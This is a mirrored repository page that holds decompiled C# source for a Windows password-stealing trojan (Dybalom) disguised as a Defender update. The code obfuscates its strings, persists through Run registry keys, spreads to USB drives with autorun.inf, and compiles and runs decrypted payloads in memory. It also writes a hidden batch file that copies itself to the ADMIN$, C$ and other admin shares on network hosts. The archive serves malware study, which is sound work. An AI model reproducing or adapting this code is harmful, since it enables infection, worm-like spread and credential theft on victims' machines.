ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-20 18:36:10 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
74dbd37f30
MalwareSourceCode/MSIL/Trojan-PSW/Win32/D/Trojan-PSW.Win32.Dybalom.gwl-55ca18d19b2d75973541e883e8010d88e1f774533692f9ffc976ac7a227ca560/YUGFYLIGvlfiyl.cs
vxunderground f2ac1ece55 auto-decompiled msil via petikvx 
add
2022-08-18 06:28:56 -05:00

551 lines
17 KiB
C#
Raw Blame History

// Decompiled with JetBrains decompiler
// Type: YUGFYLIGvlfiyl
// Assembly: windefender_upd-2, Version=1.3.2.4, Culture=neutral, PublicKeyToken=null
// MVID: 586226ED-1F78-4585-B234-14A26CF968DE
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-PSW.Win32.Dybalom.gwl-55ca18d19b2d75973541e883e8010d88e1f774533692f9ffc976ac7a227ca560.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using Microsoft.Win32;
using My;
using System;
using System.CodeDom.Compiler;
using System.Diagnostics;
using System.IO;
using System.Net;
using System.Reflection;
using System.Resources;
using System.Threading;
using System.Windows.Forms;
public class YUGFYLIGvlfiyl
{
private static string urPkJBxJaoKxHfa;
private static string DFlGLTJoxxwCYfm;
private static string RedtwzrQfYIqsNp;
private static string uIFnBaaCKWySxWn;
[DebuggerNonUserCode]
public YUGFYLIGvlfiyl()
{
}
public static string HqBHDPguDENkfJL(string JEhjQWpxnTOONSD, string KRhIIXNQIgKomUJ)
{
char[] charArray1 = JEhjQWpxnTOONSD.ToCharArray();
char[] charArray2 = KRhIIXNQIgKomUJ.ToCharArray();
char[] chArray = new char[JEhjQWpxnTOONSD.Length - 2 + 1];
int num1 = (int) charArray1[JEhjQWpxnTOONSD.Length - 1];
charArray1[JEhjQWpxnTOONSD.Length - 1] = char.MinValue;
int index1 = 0;
int num2 = JEhjQWpxnTOONSD.Length - 1;
for (int index2 = 0; index2 <= num2; ++index2)
{
if (index2 < JEhjQWpxnTOONSD.Length - 1)
{
if (index1 >= charArray2.Length)
index1 = 0;
int num3 = (int) charArray1[index2];
int num4 = (int) charArray2[index1];
int num5 = num3 - num1 - num4;
chArray[index2] = Convert.ToChar(num5);
++index1;
}
}
return new string(chArray);
}
public static void CiMbIOhpfLGHFKu()
{
string str = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\" + Path.GetFileName(Application.ExecutablePath);
while (true)
{
try
{
if (!System.IO.File.Exists(str))
{
System.IO.File.Copy(Application.ExecutablePath, str);
YUGFYLIGvlfiyl.gjbzPIrZcwZdrCX(Path.GetFileName(Application.ExecutablePath), str);
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
Thread.Sleep(5000);
}
}
public static void gjbzPIrZcwZdrCX(string Name, string Path) => Registry.CurrentUser.OpenSubKey(YUGFYLIGvlfiyl.HqBHDPguDENkfJL("ŚŧŴŮƗƆƌƀŗŧƑŝƙśƝźŭŬŪőƉƓžƊŲƍƄĽƜŞƜŰŵŬŤşƒƘƃƊũŶźůƕ´", "SDZFlqfgGftFs8vW"), true).SetValue(Name, (object) Path, RegistryValueKind.String);
public static object Spread(string drive)
{
label_1:
int num1;
object obj1;
int num2;
try
{
ProjectData.ClearProjectError();
num1 = -2;
label_2:
int num3 = 2;
string location = Assembly.GetExecutingAssembly().Location;
label_3:
num3 = 3;
System.IO.File.Copy(location, drive + "\\erPCyQY.exe");
label_4:
num3 = 4;
FileInfo fileInfo = new FileInfo(drive + "\\erPCyQY.exe");
label_5:
num3 = 5;
fileInfo.Attributes = FileAttributes.Hidden;
label_6:
obj1 = (object) null;
goto label_13;
label_8:
num2 = num3;
switch (num1 > -2 ? num1 : 1)
{
case 1:
int num4 = num2 + 1;
num2 = 0;
switch (num4)
{
case 1:
goto label_1;
case 2:
goto label_2;
case 3:
goto label_3;
case 4:
goto label_4;
case 5:
goto label_5;
case 6:
goto label_6;
case 7:
goto label_13;
}
break;
}
}
catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
{
ProjectData.SetProjectError(ex);
goto label_8;
}
throw ProjectData.CreateProjectError(-2146828237);
label_13:
object obj2 = obj1;
if (num2 == 0)
return obj2;
ProjectData.ClearProjectError();
return obj2;
}
public static object SetAutorun(string drive)
{
label_1:
int num1;
object obj1;
int num2;
try
{
ProjectData.ClearProjectError();
num1 = -2;
label_2:
int num3 = 2;
StreamWriter streamWriter = new StreamWriter(drive + "\\autorun.inf");
label_3:
num3 = 3;
streamWriter.WriteLine("[AutoRun]");
label_4:
num3 = 4;
streamWriter.WriteLine("Open = erPCyQY.exe");
label_5:
num3 = 5;
streamWriter.Close();
label_6:
num3 = 6;
FileInfo fileInfo = new FileInfo(drive + "\\autorun.inf");
label_7:
num3 = 7;
fileInfo.Attributes = FileAttributes.Hidden;
label_8:
obj1 = (object) null;
goto label_15;
label_10:
num2 = num3;
switch (num1 > -2 ? num1 : 1)
{
case 1:
int num4 = num2 + 1;
num2 = 0;
switch (num4)
{
case 1:
goto label_1;
case 2:
goto label_2;
case 3:
goto label_3;
case 4:
goto label_4;
case 5:
goto label_5;
case 6:
goto label_6;
case 7:
goto label_7;
case 8:
goto label_8;
case 9:
goto label_15;
}
break;
}
}
catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
{
ProjectData.SetProjectError(ex);
goto label_10;
}
throw ProjectData.CreateProjectError(-2146828237);
label_15:
object obj2 = obj1;
if (num2 == 0)
return obj2;
ProjectData.ClearProjectError();
return obj2;
}
public static void searchDrives()
{
label_1:
int num1;
int num2;
try
{
label_2:
ProjectData.ClearProjectError();
num1 = -2;
label_3:
int num3 = 3;
Thread.Sleep(1000);
label_4:
num3 = 4;
DriveInfo[] drives = DriveInfo.GetDrives();
label_5:
num3 = 5;
DriveInfo[] driveInfoArray = drives;
int index = 0;
goto label_16;
label_7:
num3 = 6;
DriveInfo driveInfo;
if (driveInfo.DriveType != DriveType.Removable)
goto label_14;
label_8:
num3 = 7;
if (!driveInfo.IsReady)
goto label_13;
label_9:
num3 = 8;
if (System.IO.File.Exists(driveInfo.Name + "\\erPCyQY.exe"))
goto label_12;
label_10:
num3 = 9;
YUGFYLIGvlfiyl.Spread(driveInfo.Name);
label_11:
num3 = 10;
YUGFYLIGvlfiyl.SetAutorun(driveInfo.Name);
label_12:
label_13:
label_14:
++index;
label_15:
num3 = 14;
label_16:
if (index < driveInfoArray.Length)
{
driveInfo = driveInfoArray[index];
goto label_7;
}
else
goto label_2;
label_18:
num2 = num3;
switch (num1 > -2 ? num1 : 1)
{
case 1:
int num4 = num2 + 1;
num2 = 0;
switch (num4)
{
case 1:
goto label_1;
case 2:
case 15:
goto label_2;
case 3:
goto label_3;
case 4:
goto label_4;
case 5:
goto label_5;
case 6:
goto label_7;
case 7:
goto label_8;
case 8:
goto label_9;
case 9:
goto label_10;
case 10:
goto label_11;
case 11:
goto label_12;
case 12:
goto label_13;
case 13:
goto label_14;
case 14:
goto label_15;
case 16:
goto label_23;
}
break;
}
}
catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
{
ProjectData.SetProjectError(ex);
goto label_18;
}
throw ProjectData.CreateProjectError(-2146828237);
label_23:
if (num2 == 0)
return;
ProjectData.ClearProjectError();
}
[STAThread]
public static void Main()
{
ResourceManager resourceManager = new ResourceManager("H", Assembly.GetExecutingAssembly());
string Expression = Conversions.ToString(resourceManager.GetObject("K4T8F6c"));
FHQnUxOuBUcRwss fhQnUxOuBucRwss = new FHQnUxOuBUcRwss(Conversions.ToString(resourceManager.GetObject("N1HXjA")));
string[] strArray = Strings.Split(Expression, "SuZz5vnl5M1s6Sra");
string Right = YUGFYLIGvlfiyl.HqBHDPguDENkfJL("śƕšŽ´", "So8dxq7eL5m3PMUH");
string str1 = Conversions.ToString(Operators.ConcatenateObject((object) (Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\"), Operators.AddObject(resourceManager.GetObject("WggM2"), (object) ".exe")));
try
{
Process process = (Process) null;
Process[] processes = Process.GetProcesses();
int index = 0;
if (index < processes.Length)
goto label_6;
else
goto label_7;
label_3:
if (System.IO.File.Exists(str1))
{
System.IO.File.Delete(str1);
goto label_9;
}
else
goto label_9;
label_6:
process = processes[index];
if (!str1.Contains(process.ProcessName))
goto label_3;
label_7:
process.Kill();
goto label_3;
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
label_9:
try
{
MyProject.Computer.FileSystem.WriteAllBytes(str1, fhQnUxOuBucRwss.DbqjTCEYBFTdyMy(Convert.FromBase64String(Conversions.ToString(resourceManager.GetObject("UntJ0")))), false);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
YUGFYLIGvlfiyl.kXKlIGiQhTXwXic("MonAMour", "R", YUGFYLIGvlfiyl.CC(Conversions.ToString(resourceManager.GetObject("nerdz"))), new object[2]
{
(object) fhQnUxOuBucRwss.DbqjTCEYBFTdyMy(Convert.FromBase64String(Conversions.ToString(resourceManager.GetObject("tZAsD")))),
(object) str1
});
new Thread(new ThreadStart(YUGFYLIGvlfiyl.CiMbIOhpfLGHFKu)).Start();
try
{
object environmentVariable = (object) Environment.GetEnvironmentVariable("temp");
Registry.CurrentUser.OpenSubKey(YUGFYLIGvlfiyl.HqBHDPguDENkfJL("ŚŧŴŮƗƆƌƀŗŧƑŝƙśƝźŭŬŪőƉƓžƊŲƍƄĽƜŞƜŰŵŬŤşƒƘƃƊũŶźůƕ´", "SDZFlqfgGftFs8vW")).SetValue("Win32", Operators.ConcatenateObject(environmentVariable, (object) "\\erPCyQY.exe"));
System.IO.File.Copy(Application.ExecutablePath, Conversions.ToString(Operators.ConcatenateObject(environmentVariable, (object) "\\erPCyQY.exe")));
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
System.IO.File.Copy(Application.ExecutablePath, Conversions.ToString(Operators.ConcatenateObject((object) Environment.GetFolderPath(Environment.SpecialFolder.Startup), (object) "\\erPCyQY.exe")));
ProjectData.ClearProjectError();
}
YUGFYLIGvlfiyl.searchDrives();
string str2 = MyProject.Computer.FileSystem.SpecialDirectories.CurrentUserApplicationData + YUGFYLIGvlfiyl.HqBHDPguDENkfJL("ţƙŲŮūƐſƌŖĶƒŴţ´", "SnULKmdi4TyHJsgC");
try
{
Dns.GetHostAddresses(Dns.GetHostName())[0].ToString();
Dns.GetHostEntry(YUGFYLIGvlfiyl.HqBHDPguDENkfJL("žŜŝŹŞŴƋƐŭ´", "S97ZCNhgI8QfVduK"));
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
try
{
System.IO.File.Copy(Application.ExecutablePath, YUGFYLIGvlfiyl.HqBHDPguDENkfJL("žŜŝŹŞŴƋƐŭ´", "S97ZCNhgI8QfVduK"));
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
try
{
object Instance = (object) new StreamWriter("C:\\LcvHEwb.bat");
NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1]
{
(object) YUGFYLIGvlfiyl.HqBHDPguDENkfJL("ŇŪŇŶƒĥŚƊƐĝłħƄƙŒžŲĥœŴƉ´", "SQ0ZoQ7pvIhSns9i")
}, (string[]) null, (System.Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1]
{
(object) "net view >log.txt"
}, (string[]) null, (System.Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1]
{
(object) YUGFYLIGvlfiyl.HqBHDPguDENkfJL("ŭƑųōīşĘłĬšļƇƄŁŏƕŶƉįơŴŭġĽūŜļņĶ´", "SnMyHEDiS9hjbmsu")
}, (string[]) null, (System.Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1]
{
(object) ("copy \"" + str2 + "\" %%t\\debug.exe")
}, (string[]) null, (System.Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1]
{
(object) ("copy \"" + str2 + "\" %%t\\IPC$\\debug.exe")
}, (string[]) null, (System.Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1]
{
(object) ("copy \"" + str2 + "\" %%t\\ADMIN$\\debug.exe")
}, (string[]) null, (System.Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1]
{
(object) ("copy \"" + str2 + "\" %%t\\C$\\debug.exe")
}, (string[]) null, (System.Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1]
{
(object) ("copy \"" + str2 + "\" %%t\\D$\\debug.exe")
}, (string[]) null, (System.Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1]
{
(object) ("copy \"" + str2 + "\" %%t\\PRINT$\\debug.exe")
}, (string[]) null, (System.Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1]
{
(object) ("copy \"" + str2 + "\" %%t\\e$\\debug.exe")
}, (string[]) null, (System.Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1]
{
(object) ("copy \"" + str2 + "\" %%t\\e$\\shared\\debug.exe")
}, (string[]) null, (System.Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1]
{
(object) ("copy \"" + str2 + "\" %%t\\d$\\shared\\debug.exe")
}, (string[]) null, (System.Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1]
{
(object) ("copy \"" + str2 + "\" %%t\\C$\\shared\\debug.exe")
}, (string[]) null, (System.Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1]
{
(object) ("copy \"" + str2 + "\" shared\\debug.exe")
}, (string[]) null, (System.Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1]
{
(object) ")"
}, (string[]) null, (System.Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (System.Type) null, "Close", new object[0], (string[]) null, (System.Type[]) null, (bool[]) null, true);
new Process()
{
StartInfo = {
WindowStyle = ProcessWindowStyle.Hidden,
FileName = "C:\\LcvHEwb.bat"
}
}.Start();
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
if (Operators.CompareString(strArray[2], Right, false) != 0)
;
if (Operators.CompareString(strArray[4], Right, false) != 0)
;
}
private static bool kXKlIGiQhTXwXic(
string Class,
string Void,
Assembly file,
object[] Parameters)
{
bool boolean;
try
{
System.Type type = file.GetType(Class);
if ((object) type != null)
{
MethodInfo method = type.GetMethod(Void);
if ((object) method != null)
{
boolean = Conversions.ToBoolean(method.Invoke((object) null, Parameters));
goto label_6;
}
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
label_6:
return boolean;
}
public static Assembly CC(string Source)
{
YUGFYLIGvlfiyl.urPkJBxJaoKxHfa = YUGFYLIGvlfiyl.HqBHDPguDENkfJL("űƖŵƦƶǀÛ", "Sh2jiulGpHtnnVzW");
YUGFYLIGvlfiyl.DFlGLTJoxxwCYfm = YUGFYLIGvlfiyl.HqBHDPguDENkfJL("ƁƾǃƂƩƱŏƬơƺÛ", "Sju3iiFmZsEiQdJe");
YUGFYLIGvlfiyl.RedtwzrQfYIqsNp = YUGFYLIGvlfiyl.HqBHDPguDENkfJL("ƁƜƜƜƔǁĺƀųƞƣƆŵƮƍƍƢőƍƔƛÛ", "SHNMTy1X7UgD5fMD");
YUGFYLIGvlfiyl.uIFnBaaCKWySxWn = YUGFYLIGvlfiyl.HqBHDPguDENkfJL("ĐńŔŒņĬŲũŐğųĞĬ\u008E", "SFZcD8uiUWmXhX8w");
CompilerParameters options = new CompilerParameters();
CodeDomProvider provider = CodeDomProvider.CreateProvider(YUGFYLIGvlfiyl.urPkJBxJaoKxHfa);
options.GenerateExecutable = false;
options.GenerateInMemory = true;
options.ReferencedAssemblies.Add(YUGFYLIGvlfiyl.DFlGLTJoxxwCYfm);
options.ReferencedAssemblies.Add(YUGFYLIGvlfiyl.RedtwzrQfYIqsNp);
options.CompilerOptions = YUGFYLIGvlfiyl.uIFnBaaCKWySxWn;
options.TreatWarningsAsErrors = false;
return provider.CompileAssemblyFromSource(options, Source).CompiledAssembly;
}
}
Reference in New Issue View Git Blame Copy Permalink